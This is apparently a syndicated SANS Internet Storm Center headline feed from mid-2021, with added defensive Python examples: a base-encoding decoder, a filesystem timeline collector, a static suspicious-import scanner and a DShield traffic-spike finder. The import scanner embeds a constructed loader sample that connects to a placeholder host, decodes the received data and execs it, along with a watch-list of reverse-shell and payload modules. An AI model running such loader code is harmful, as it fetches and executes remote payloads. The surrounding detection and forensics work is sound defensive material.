This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Monday, July 26th, 2021…
Tag: SANS Internet Storm Center, InfoCON: green
Wireshark 3.4.7 Released, (Sun, Jul 25th)
Wireshark version 3.4.7 was released.
Active Directory Certificate Services (ADCS – PKI) domain admin vulnerability, (Sat, Jul 24th)
Phew, this was a really bad week for Microsoft (and a lot of reading for all of us). And just when we thought that the fiasco with the…
Agent.Tesla Dropped via a .daa Image and Talking to Telegram, (Sat, Jul 24th)
A few days ago, I found an interesting file delivered by email (why change a winning combination?). The file has a nice extension: “.daa” (Direct Access Archive). We…
Uncovering Shenanigans in an IP Address Block via Hurricane Electric’s BGP Toolkit (II), (Fri, Jul 23rd)
Today’s diary revisits hunting for dodgy domains via Hurricane Electric's BGP Toolkit [1]. This was previously done in an earlier diary [2], and I plan to do this…
ISC Stormcast For Friday, July 23rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7598, (Fri, Jul 23rd)
Lost in the Cloud: Akamai DNS Outage, (Thu, Jul 22nd)
As we already got a number of notes from readers: Currently, Akamai's DNS service appears to experience an outage that affects numerous other large websites.
ISC Stormcast For Thursday, July 22nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7596, (Thu, Jul 22nd)
“Summer of SAM”: Microsoft Releases Guidance for CVE-2021-36934, (Wed, Jul 21st)
Microsoft released a knowledge base article regarding CVE-2021-36934 [1]. Bojan yesterday explained the vulnerability in more detail. Recent versions of Microsoft Windows expose several system files due to…
ISC Stormcast For Wednesday, July 21st, 2021 https://isc.sans.edu/podcastdetail.html?id=7594, (Wed, Jul 21st)
Summer of SAM – incorrect permissions on Windows 10/11 hives, (Tue, Jul 20th)
If you opened Twitter today you were probably flooded with news about the latest security issue with Windows. For those that have ISC as their home page (yay!)…
ISC Stormcast For Tuesday, July 20th, 2021 https://isc.sans.edu/podcastdetail.html?id=7592, (Tue, Jul 20th)
New Windows Print Spooler Vulnerability – CVE-2021-34481, (Mon, Jul 19th)
A new, unpatched, vulnerability has been discovered in the Windows Print Spooler and is being tracked under CVE-2021-34481. Discovered by Jacob Baines at Dragos, this one requires local…
ISC Stormcast For Monday, July 19th, 2021 https://isc.sans.edu/podcastdetail.html?id=7590, (Mon, Jul 19th)
Video: CyberChef BASE85 Decoding, (Sun, Jul 18th)
In this video, I show how to decode the sample of Xavier's diary entry “Multiple BaseXX Obfuscations” with CyberChef.
BASE85 Decoding With base64dump.py, (Sat, Jul 17th)
Xavier's diary entry “Multiple BaseXX Obfuscations” covers a malicious script that is encoded with different “base” encodings. Xavier starts with my tool base64dump.py, but he can not do…
Multiple BaseXX Obfuscations, (Fri, Jul 16th)
I found an interesting malicious Python script during my daily hunting routine. The script has a VT score of 2/58 [1] (SHA256: 6990298edd0d66850578bfd1e1b9d42abfe7a8d1deb828ef0c7017281ee7c5b7). Its purpose is to perform the…
ISC Stormcast For Friday, July 16th, 2021 https://isc.sans.edu/podcastdetail.html?id=7588, (Fri, Jul 16th)
ISC Stormcast For Thursday, July 15th, 2021 https://isc.sans.edu/podcastdetail.html?id=7586, (Thu, Jul 15th)
USPS Phishing Using Telegram to Collect Data, (Tue, Jul 13th)
Phishing… at least they don't understand security any better than most kids. The latest example is a simple USPS phish. The lure is an email claiming that a…
One way to fail at malspam – give recipients the wrong password for an encrypted attachment, (Wed, Jul 14th)
It is not unusual for malspam authors to encrypt the malicious files that they attach to messages they send out. Whether they encrypt the malicious file itself (as…
ISC Stormcast For Wednesday, July 14th, 2021 https://isc.sans.edu/podcastdetail.html?id=7584, (Wed, Jul 14th)
Microsoft July 2021 Patch Tuesday, (Tue, Jul 13th)
This month we got patches for 117 vulnerabilities. Of these, 13 are critical, 6 were previously disclosed and 4 are being exploited according to Microsoft.
ISC Stormcast For Tuesday, July 13th, 2021 https://isc.sans.edu/podcastdetail.html?id=7582, (Tue, Jul 13th)
ISC Stormcast For Monday, July 12th, 2021 https://isc.sans.edu/podcastdetail.html?id=7580, (Mon, Jul 12th)
Securing and Optimizing Networks: Using pfSense Traffic Shaper Limiters to Combat Bufferbloat, (Mon, Feb 15th)
[This is a guest diary by Yee Ching Tok (personal website here (https://poppopretn.com)). Feedback welcome either via comments or our contact page (https://isc.sans.edu/contact.html)]
Scanning for Microsoft Secure Socket Tunneling Protocol, (Sat, Jul 10th)
Over the past month I noticed a resurgence of probes by DigitalOcean looking for the Microsoft (MS) Secure Socket Tunneling Protocol (SSTP). This MS proprietary VPN protocol is…
ISC Stormcast For Friday, July 9th, 2021 https://isc.sans.edu/podcastdetail.html?id=7578, (Fri, Jul 9th)
Hancitor tries XLL as initial malware file, (Fri, Jul 9th)
Using Sudo with Python For More Security Controls, (Thu, Jul 8th)
I'm a big fan of the Sudo [1] command. This tool, available on every UNIX flavor, allows system administrators to provide access to certain users/groups to certain commands as…
ISC Stormcast For Thursday, July 8th, 2021 https://isc.sans.edu/podcastdetail.html?id=7576, (Thu, Jul 8th)
ISC Stormcast For Wednesday, July 7th, 2021 https://isc.sans.edu/podcastdetail.html?id=7574, (Wed, Jul 7th)
Microsoft Releases Patches for CVE-2021-34527, (Wed, Jul 7th)
Microsoft today released patches for CVE-2021-34527, the vulnerability also known as “PrintNightmare”. Patches are currently available for these versions of Windows:
Python DLL Injection Check, (Tue, Jul 6th)
There are many security tools that inject DLLs into processes running on a Windows system. The classic examples are anti-virus products. They like to inject plenty of code…
ISC Stormcast For Tuesday, July 6th, 2021 https://isc.sans.edu/podcastdetail.html?id=7572, (Tue, Jul 6th)
ISC Stormcast For Monday, July 5th, 2021 https://isc.sans.edu/podcastdetail.html?id=7570, (Sun, Jul 4th)
DIY CD/DVD Destruction – Follow Up, (Sun, Jul 4th)
Thanks a lot to all of you who posted a comment on my diary entry “DIY CD/DVD Destruction”. They inspired me to try out some other methods.
Finding Strings With oledump.py, (Sat, Jul 3rd)
In diary entry “CFBF Files Strings Analysis” I show how to extract strings from CFBF/ole files with my tool oledump.py.
Kaseya VSA Users Hit by Ransomware, (Fri, Jul 2nd)
We are aware that some MSSPs' customers (Managed Security Service Providers) have been hit by ransomware. It seems that four (4) MSSPs have been affected until now. The…
ISC Stormcast For Friday, July 2nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7568, (Fri, Jul 2nd)
“inception.py”… Multiple Base64 Encodings, (Fri, Jul 2nd)
“Inception” is a very nice SF movie in which, if you did not watch it, dreams are implemented in people's minds to help to get access to sensitive information…
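The nested-encoding theme of this entry, and of the “Multiple BaseXX Obfuscations” and BASE85 decoding entries above, comes down to one mechanical step repeated: guess the alphabet of the current layer, decode it, and check whether the result looks like the next layer or the final script. The decoder below is an added example, not code from the diaries or from base64dump.py. It assumes the standard RFC 4648 base16/32/64 alphabets and Python's base85 alphabet, accepts a decoded layer only when the output is printable ASCII (a heuristic that rejects the garbage a wrong decoder produces, not a guarantee), and builds its own sample input.

```python
import base64
import binascii
import re
import string

# Candidate alphabets, most restrictive first. Assumption: the sample uses the
# standard RFC 4648 base16/32/64 alphabets and Python's base85 alphabet.
_CANDIDATES = [
    ("base16", re.compile(r"[0-9A-Fa-f]+"),
     lambda b: base64.b16decode(b, casefold=True)),
    ("base32", re.compile(r"[A-Z2-7]+=*"), base64.b32decode),
    ("base64", re.compile(r"[A-Za-z0-9+/]+=*"), base64.b64decode),
    ("base85", re.compile(r"[0-9A-Za-z!#$%&()*+\-;<=>?@^_`{|}~]+"), base64.b85decode),
]
_PRINTABLE = set(string.printable.encode())


def looks_like_text(data: bytes) -> bool:
    """Heuristic for accepting a decoded layer: non-empty, printable ASCII only.
    Output from trying the wrong decoder almost always fails this test."""
    return bool(data) and all(b in _PRINTABLE for b in data)


def decode_layer(blob: bytes):
    """Peel one encoding layer. Returns (encoding_name, decoded_bytes) or None."""
    text = blob.strip()
    try:
        ascii_text = text.decode("ascii")
    except UnicodeDecodeError:
        return None
    for name, alphabet, decoder in _CANDIDATES:
        if not alphabet.fullmatch(ascii_text):
            continue
        try:
            decoded = decoder(text)
        except (ValueError, binascii.Error):  # wrong length/padding for this alphabet
            continue
        if looks_like_text(decoded):
            return name, decoded
    return None


def peel(blob: bytes, max_depth: int = 16):
    """Decode layer after layer until nothing is recognised.
    Returns (list of encodings outermost-first, innermost payload)."""
    layers, current = [], blob
    for _ in range(max_depth):
        result = decode_layer(current)
        if result is None:
            break
        name, current = result
        layers.append(name)
    return layers, current


def build_sample(payload: bytes) -> bytes:
    """Constructed input: payload wrapped base85 -> base64 -> base32 -> base16."""
    return base64.b16encode(base64.b32encode(base64.b64encode(base64.b85encode(payload))))


if __name__ == "__main__":
    layers, payload = peel(build_sample(b"print('innermost layer reached')"))
    print(layers, payload.decode())
```

The alphabets nest (every hex string is also valid base32 and base64 text), which is why the order of the candidate list matters and why a decoded layer is only kept when it reads as text; a real sample whose innermost payload is binary would need a different acceptance test, such as a known file header.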
ISC Stormcast For Thursday, July 1st, 2021 https://isc.sans.edu/podcastdetail.html?id=7566, (Thu, Jul 1st)
CVE-2021-1675: Incomplete Patch and Leaked RCE Exploit, (Wed, Jun 30th)
[preliminary. please let us know if we missed something or made any mistakes]
June 2021 Forensic Contest: Answers and Analysis, (Wed, Jun 30th)
ISC Stormcast For Tuesday, June 29th, 2021 https://isc.sans.edu/podcastdetail.html?id=7562, (Tue, Jun 29th)
Diving into a Google Sweepstakes Phishing E-mail, (Tue, Jun 29th)
I was recently forwarded another phishing e-mail to examine. This time, it was an e-mail that claimed to be from Google. The e-mail included a pdf file, and…
CFBF Files Strings Analysis, (Mon, Jun 28th)
The Office file format that predates the OOXML format is a binary format based on the CFBF format. I informally call this the ole file format.
ISC Stormcast For Monday, June 28th, 2021 https://isc.sans.edu/podcastdetail.html?id=7560, (Mon, Jun 28th)
DIY CD/DVD Destruction, (Sun, Jun 27th)
I have some personal CDs & DVDs to dispose of. And I don't want them to remain (easily) readable.
CVE-2019-9670: Zimbra Collaboration Suite XXE vulnerability, (Sat, Jun 26th)
This XML External Entity injection (XXE) vulnerability disclosed in March 2019 is still actively scanned for a vulnerable mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10…
ISC Stormcast For Friday, June 25th, 2021 https://isc.sans.edu/podcastdetail.html?id=7558, (Fri, Jun 25th)
Is this traffic bAD?, (Fri, Jun 25th)
It seems like every time I take a handler shift lately, I'm talking about an uptick of traffic on another port and I'm not breaking that trend today…
Do you Like Cookies? Some are for sale!, (Thu, Jun 24th)
Cookies… These small pieces of information are always with us. Since the GDPR was kicked off in Europe, we are flooded by pop-ups asking if we accept “cookies”…
ISC Stormcast For Thursday, June 24th, 2021 https://isc.sans.edu/podcastdetail.html?id=7556, (Thu, Jun 24th)
Standing With Security Researchers Against Misuse of the DMCA, (Wed, Jun 23rd)
As Dean of Research for our graduate school (sans.edu), I often assist students in developing their research ideas. The research conducted by our students is valuable and important…
ISC Stormcast For Wednesday, June 23rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7554, (Wed, Jun 23rd)
ISC Stormcast For Monday, June 21st, 2021 https://isc.sans.edu/podcastdetail.html?id=7550, (Mon, Jun 21st)
Executives and Ransomware Webcast: Stop, Collaborate, and Listen! – https://www.sans.org/webcasts/executives-ransomware-stop-collaborate-listen-120150, (Mon, Jun 21st)
— Rick Wanner MSISE – rwanner at isc dot sans dot edu – Twitter:namedeplume (Protected)
Mitre CWE – Common Weakness Enumeration, (Mon, Jun 21st)
If you are involved in the security industry you are at least somewhat familiar with the Mitre ATT&CK framework, the very useful, community driven, knowledgebase of attack threat…
ISC Stormcast For Tuesday, June 22nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7552, (Tue, Jun 22nd)
Phishing asking recipients not to report abuse, (Tue, Jun 22nd)
It can be a little disheartening to deal with well-prepared phishing attacks every day, since one can easily see how even users who are fully “security-aware” could fall…
ISC Stormcast For Wednesday, June 16th, 2021 https://isc.sans.edu/podcastdetail.html?id=7544, (Wed, Jun 16th)
Multi Perimeter Device Exploit Mirai Version Hunting For Sonicwall, DLink, Cisco and more, (Tue, Jun 15th)
Vulnerable perimeter devices remain a popular target, and we do see consistent exploit attempts against them. This weekend, Guy wrote about some scans for Fortinet vulnerabilities [1], and…
ISC Stormcast For Tuesday, June 15th, 2021 https://isc.sans.edu/podcastdetail.html?id=7542, (Tue, Jun 15th)
ISC Stormcast For Monday, June 14th, 2021 https://isc.sans.edu/podcastdetail.html?id=7540, (Mon, Jun 14th)
Update: mac-robber.py, (Sun, Jun 13th)
Almost 4 years ago, I wrote a python version of mac-robber. I use it fairly regularly at $dayjob. This past week, one of my co-workers was using it,…
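mac-robber walks a mounted filesystem and emits one bodyfile record per entry, which mactime then sorts into a timeline. The code below is an added example of that idea, not Jim Clausing's mac-robber.py. It uses lstat() so that symlinks are reported as themselves and no file is opened or read (a collection tool must not touch the evidence's own timestamps), writes the TSK 3.x bodyfile layout MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime with the MD5 field left at 0 as mac-robber does, and builds its sample tree in a temporary directory.

```python
import os
import stat
import tempfile

BODYFILE_FIELDS = ("md5", "name", "inode", "mode", "uid", "gid",
                   "size", "atime", "mtime", "ctime", "crtime")


def bodyfile_line(path: str) -> str:
    """One TSK 3.x bodyfile record for path.
    lstat() neither follows symlinks nor reads the file, so the entry's own
    access time is left alone. MD5 stays 0 as mac-robber leaves it (hashing
    would mean reading every file). crtime is only filled on platforms that
    expose st_birthtime; elsewhere it is 0."""
    st = os.lstat(path)
    crtime = int(getattr(st, "st_birthtime", 0))
    values = (0, path, st.st_ino, stat.filemode(st.st_mode), st.st_uid, st.st_gid,
              st.st_size, int(st.st_atime), int(st.st_mtime), int(st.st_ctime), crtime)
    return "|".join(str(v) for v in values)


def mac_robber(root: str):
    """Yield bodyfile records for root and everything below it, in a stable order."""
    yield bodyfile_line(root)
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # in-place sort also fixes the order os.walk descends
        for name in dirnames + sorted(filenames):
            yield bodyfile_line(os.path.join(dirpath, name))


def parse_bodyfile_line(line: str) -> dict:
    """Split a record back into its 11 named fields (what mactime consumes)."""
    fields = line.split("|")
    if len(fields) != len(BODYFILE_FIELDS):
        raise ValueError("expected 11 fields, got %d" % len(fields))
    return dict(zip(BODYFILE_FIELDS, fields))


def demo() -> list:
    """Constructed sample tree: root/notes.txt (12 bytes) and root/sub/run.sh."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "sub"))
        with open(os.path.join(root, "notes.txt"), "wb") as fh:
            fh.write(b"hello, world")
        with open(os.path.join(root, "sub", "run.sh"), "wb") as fh:
            fh.write(b"#!/bin/sh\nid\n")
        return list(mac_robber(root))


if __name__ == "__main__":
    for record in demo():
        print(record)
```

Run against a real image, point mac_robber() at the mount point of a read-only mount and redirect the records to a file; mactime -b then builds the timeline. The split on "|" in parse_bodyfile_line() is the reason mactime chokes on names containing that character, which is worth knowing before a walk over user-controlled filenames.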
Fortinet Targeted for Unpatched SSL VPN Discovery Activity, (Sat, Jun 12th)
Over the past 60 days, I have observed scanning activity to discover FortiGate SSL VPN unpatched services. Fortinet has fixed several critical vulnerabilities in SSL VPN and web…
Sonicwall SRA 4600 Targeted By an Old Vulnerability, (Fri, Jun 11th)
Devices and applications used to provide remote access are juicy targets. I've already been involved in many ransomware cases and most of the time, the open door was…
Keeping an Eye on Dangerous Python Modules, (Fri, Jun 11th)
With Python getting more and more popular, especially on Microsoft Operating systems, it's common to find malicious Python scripts today. I already covered some of them in previous…
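A first triage step for an unknown Python script is to list what it imports and whether it builds code at runtime, without executing it. The scanner below is an added example, not the diary's code: it parses the script with the ast module only, also catches imports hidden behind __import__() and importlib.import_module() with a literal name, and scores the result. The watch-list of modules and the sample script are constructed for illustration.

```python
import ast

# Illustrative watch-list (assumption, not the diary's own list): modules that
# are unremarkable in admin scripts but worth a look in an unknown sample.
WATCH_LIST = {
    "ctypes": "calls native code / Win32 API (shellcode loaders)",
    "subprocess": "spawns external commands",
    "socket": "raw network access (C2, reverse shells)",
    "base64": "decodes embedded payloads",
    "zlib": "decompresses embedded payloads",
    "marshal": "loads serialized code objects",
    "winreg": "registry access (persistence)",
    "win32api": "Win32 API via pywin32",
}
# Builtins that turn data into code at runtime.
DYNAMIC_CODE = {"exec", "eval", "compile", "__import__"}


def _literal_module(call: ast.Call):
    """Top-level module name if the first argument is a string literal, else None."""
    if call.args and isinstance(call.args[0], ast.Constant) and isinstance(call.args[0].value, str):
        return call.args[0].value.split(".")[0]
    return None


def scan_source(source: str) -> dict:
    """Static triage of a script: the source is parsed, never executed."""
    tree = ast.parse(source)
    imports, dynamic = set(), set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            imports.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            imports.add(node.module.split(".")[0])
        elif isinstance(node, ast.Call):
            func = node.func
            if isinstance(func, ast.Name):
                if func.id in DYNAMIC_CODE:
                    dynamic.add(func.id)
                if func.id == "__import__":  # __import__("socket") hides the import
                    name = _literal_module(node)
                    if name:
                        imports.add(name)
            elif isinstance(func, ast.Attribute) and func.attr == "import_module":
                name = _literal_module(node)  # importlib.import_module("socket")
                if name:
                    imports.add(name)
    flagged = {m: WATCH_LIST[m] for m in sorted(imports) if m in WATCH_LIST}
    return {"imports": sorted(imports), "flagged": flagged, "dynamic_code": sorted(dynamic)}


def risk_score(report: dict) -> int:
    """Crude ranking for sorting a batch: 1 per flagged module, 2 per dynamic-code call."""
    return len(report["flagged"]) + 2 * len(report["dynamic_code"])


# Constructed sample resembling a staged loader; it is parsed, never run.
SAMPLE = """\
import base64, zlib
from ctypes import windll, c_char_p
import importlib
sock = importlib.import_module("socket")
conn = sock.create_connection(("198.51.100.7", 4444))
blob = zlib.decompress(base64.b64decode(conn.recv(4096)))
exec(compile(blob, "<mem>", "exec"))
"""

if __name__ == "__main__":
    report = scan_source(SAMPLE)
    print(report, "score", risk_score(report))
```

The limits are the usual ones for static checks: a module name assembled at runtime (for example from a decoded string) is invisible to _literal_module(), which is exactly why the dynamic_code list is reported alongside the imports; a script that scores on that list alone still deserves a look in a sandbox.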
ISC Stormcast For Friday, June 11th, 2021 https://isc.sans.edu/podcastdetail.html?id=7538, (Fri, Jun 11th)
Are Cookie Banners a Waste of Time or a Complete Waste of Time?, (Thu, May 20th)
Legislation, in particular in the European Union, has led to a proliferation of “Cookie Banners.” Warning banners that either ask you for blanket permission to set cookies or,…
ISC Stormcast For Thursday, June 10th, 2021 https://isc.sans.edu/podcastdetail.html?id=7536, (Thu, Jun 10th)
Architecture, compilers and black magic, or “what else affects the ability of AVs to detect malicious files”, (Wed, Jun 9th)
In my last diary, we went over the impact of different Base encodings on the ability of anti-malware tools to detect malicious code [1]. Since results of our tests…
ISC Stormcast For Wednesday, June 9th, 2021 https://isc.sans.edu/podcastdetail.html?id=7534, (Wed, Jun 9th)
Microsoft June 2021 Patch Tuesday, (Tue, Jun 8th)
This month we got patches for 50 vulnerabilities. Of these, 5 are critical, 2 were previously disclosed and 6 are already being exploited according to Microsoft.
ISC Stormcast For Tuesday, June 8th, 2021 https://isc.sans.edu/podcastdetail.html?id=7532, (Tue, Jun 8th)
Amazon Sidewalk: Cutting Through the Hype, (Mon, Jun 7th)
Later this week (tomorrow?), Amazon will enable its new Sidewalk feature. The feature has already gotten a lot of bad press. Much of this comes from the fact…
ISC Stormcast For Monday, June 7th, 2021 https://isc.sans.edu/podcastdetail.html?id=7530, (Mon, Jun 7th)
Strange goings on with port 37, (Thu, Jun 3rd)
Similar to Yee Ching's diary on Thursday, I noticed an oddity in the Dshield data last weekend (which I had hoped to discuss in a diary on Wednesday,…
Russian Dolls VBS Obfuscation, (Fri, Jun 4th)
We received an interesting sample from one of our readers (thanks Henry!) and we like this. If you find something interesting, we are always looking for fresh meat!…
ISC Stormcast For Friday, June 4th, 2021 https://isc.sans.edu/podcastdetail.html?id=7528, (Fri, Jun 4th)
DShield Data Analysis: Taking a Look at Port 45740 Activity, (Thu, Jun 3rd)
At the SANS Internet Storm Center (ISC), handlers frequently analyze data submitted from DShield participants to determine activity trends and potential attacks. A few days ago on May…
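The per-port trend check that this diary, the port-37 entry and the “Is this traffic bAD?” entry above describe can be reproduced over raw submission lines. The code below is an added example, not ISC's own tooling. It assumes the tab-separated DShield submission layout (date time tz, sensor id, count, source IP, source port, target IP, target port, protocol, flags), uses constructed log lines with documentation-range addresses, and flags a port whose latest-day hit count is at least five times its earlier daily average and comes from at least two distinct sources, so that one noisy scanner does not trip it.

```python
from collections import defaultdict

# Constructed sample in the tab-separated layout of DShield submissions (assumed:
# date time tz, sensor id, count, source IP, source port, target IP, target port,
# protocol number, TCP flags). Addresses come from the documentation ranges.
SAMPLE_LOG = [
    "2021-05-29 01:12:03 +00:00\t42\t1\t198.51.100.7\t51234\t203.0.113.5\t22\t6\tS",
    "2021-05-29 04:40:18 +00:00\t42\t1\t198.51.100.9\t40021\t203.0.113.5\t22\t6\tS",
    "2021-05-29 09:03:55 +00:00\t42\t1\t192.0.2.33\t33044\t203.0.113.5\t45740\t6\tS",
    "2021-05-30 02:15:40 +00:00\t42\t1\t198.51.100.7\t51300\t203.0.113.5\t22\t6\tS",
    "2021-05-30 07:22:01 +00:00\t42\t1\t198.51.100.12\t44010\t203.0.113.5\t22\t6\tS",
    "2021-05-30 22:48:12 +00:00\t42\t1\t192.0.2.33\t33100\t203.0.113.5\t45740\t6\tS",
    "2021-05-31 00:05:31 +00:00\t42\t1\t198.51.100.7\t51400\t203.0.113.5\t22\t6\tS",
    "2021-05-31 03:11:09 +00:00\t42\t1\t198.51.100.21\t60120\t203.0.113.5\t22\t6\tS",
    "2021-05-31 10:00:02 +00:00\t42\t3\t192.0.2.33\t33210\t203.0.113.5\t45740\t6\tS",
    "2021-05-31 10:00:05 +00:00\t42\t2\t192.0.2.71\t41001\t203.0.113.5\t45740\t6\tS",
    "2021-05-31 10:00:09 +00:00\t42\t2\t192.0.2.88\t50233\t203.0.113.5\t45740\t6\tS",
    "2021-05-31 10:00:14 +00:00\t42\t3\t192.0.2.104\t35555\t203.0.113.6\t45740\t6\tS",
]


def parse_dshield(lines):
    """Keep only what the trend check needs: day, count, source, target, target port."""
    records = []
    for line in lines:
        if line.startswith("#"):
            continue
        fields = line.rstrip("\n").split("\t")
        if len(fields) < 9:
            continue  # malformed submission line
        records.append({
            "day": fields[0][:10], "count": int(fields[2]),
            "src": fields[3], "dst": fields[5], "dport": int(fields[6]),
        })
    return records


def per_day_port(records):
    """(day, port) -> hits plus distinct sources and targets."""
    table = defaultdict(lambda: {"hits": 0, "sources": set(), "targets": set()})
    for r in records:
        cell = table[(r["day"], r["dport"])]
        cell["hits"] += r["count"]
        cell["sources"].add(r["src"])
        cell["targets"].add(r["dst"])
    return table


def find_spikes(records, factor=5.0, min_sources=2):
    """Ports whose latest-day hits are >= factor x the earlier daily average
    (days with no traffic count as 0) and come from >= min_sources addresses."""
    table = per_day_port(records)
    days = sorted({day for day, _ in table})
    if len(days) < 2:
        return []
    last, earlier = days[-1], days[:-1]
    spikes = []
    for port in sorted({port for _, port in table}):
        if (last, port) not in table:
            continue
        cell = table[(last, port)]
        baseline = sum(table[(d, port)]["hits"] if (d, port) in table else 0
                       for d in earlier) / len(earlier)
        if cell["hits"] >= factor * max(baseline, 1.0) and len(cell["sources"]) >= min_sources:
            spikes.append({"port": port, "day": last, "hits": cell["hits"], "baseline": baseline,
                           "sources": len(cell["sources"]), "targets": len(cell["targets"])})
    return spikes


if __name__ == "__main__":
    for spike in find_spikes(parse_dshield(SAMPLE_LOG)):
        print(spike)
```

The distinct-source count is the part worth keeping when the window grows from days to weeks: a port that is suddenly hit from many addresses is what the port 45740 and port 37 diaries went looking for, whereas a single source hammering one port is usually just a misconfigured scanner.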
ISC Stormcast For Thursday, June 3rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7526, (Thu, Jun 3rd)
Wireshark 3.4.6 (and 3.2.14) released, (Wed, Jun 2nd)
A new version of wireshark is out, a couple of bugfixes including a QUIC TLK decryption issue. Also, the Windows version now comes with npcap 1.31 (updated from…
ISC Stormcast For Wednesday, June 2nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7524, (Wed, Jun 2nd)
Guildma is now using Finger and Signed Binary Proxy Execution to evade defenses, (Mon, May 31st)
ISC Stormcast For Tuesday, June 1st, 2021 https://isc.sans.edu/podcastdetail.html?id=7522, (Tue, Jun 1st)
Quick and dirty Python: nmap, (Mon, May 31st)
Continuing on from the “Quick and dirty Python: masscan” diary, which implemented a simple port scanner in Python using masscan to detect web instances on TCP ports 80…
Video: Cobalt Strike & DNS – Part 1, (Sun, May 30th)
One of the Cobalt Strike servers reported by Brad Duncan also communicates over DNS.
YARA Release v4.1.1, (Sun, May 30th)
YARA version 4.1.1 was released.
Sysinternals: Procmon, Sysmon, TcpView and Process Explorer update, (Sun, May 30th)
New versions of Sysinternals' tools Procmon, Sysmon, TcpView and Process Explorer were released.
Spear-phishing Email Targeting Outlook Mail Clients, (Sat, May 29th)
In February I posted about spam pretending to be an Outlook Version update [1] and now for the past several weeks I have been receiving spear-phishing emails that…
Malicious PowerShell Hosted on script.google.com, (Fri, May 28th)
Google has an incredible portfolio of services. Besides the classic ones, there are less known services and… they could be very useful for attackers too. One of them…
ISC Stormcast For Friday, May 28th, 2021 https://isc.sans.edu/podcastdetail.html?id=7520, (Fri, May 28th)
All your Base are…nearly equal when it comes to AV evasion, but 64-bit executables are not, (Thu, May 27th)
Malware authors like to use a variety of techniques to avoid detection of their creations by anti-malware tools. As the old saying goes, necessity is the mother of…
ISC Stormcast For Thursday, May 27th, 2021 https://isc.sans.edu/podcastdetail.html?id=7518, (Thu, May 27th)
ISC Stormcast For Wednesday, May 26th, 2021 https://isc.sans.edu/podcastdetail.html?id=7516, (Wed, May 26th)
A Survey of Bluetooth Vulnerabilities Trends, (Wed, May 26th)
As usage of fitness trackers, wireless headsets and smart home devices becomes increasingly popular in our daily lives, a growing reliance on the Bluetooth protocol is expected as…
VMware Security Advisory VMSA-2021-0010, (Tue, May 25th)
VMware has issued a critical security advisory VMSA-2021-0010 (CVSSv3 score ranging from 6.5-9.8). The products affected are VMware vCenter Server and VMware Cloud Foundation, and it addresses CVE-2021-21985 and…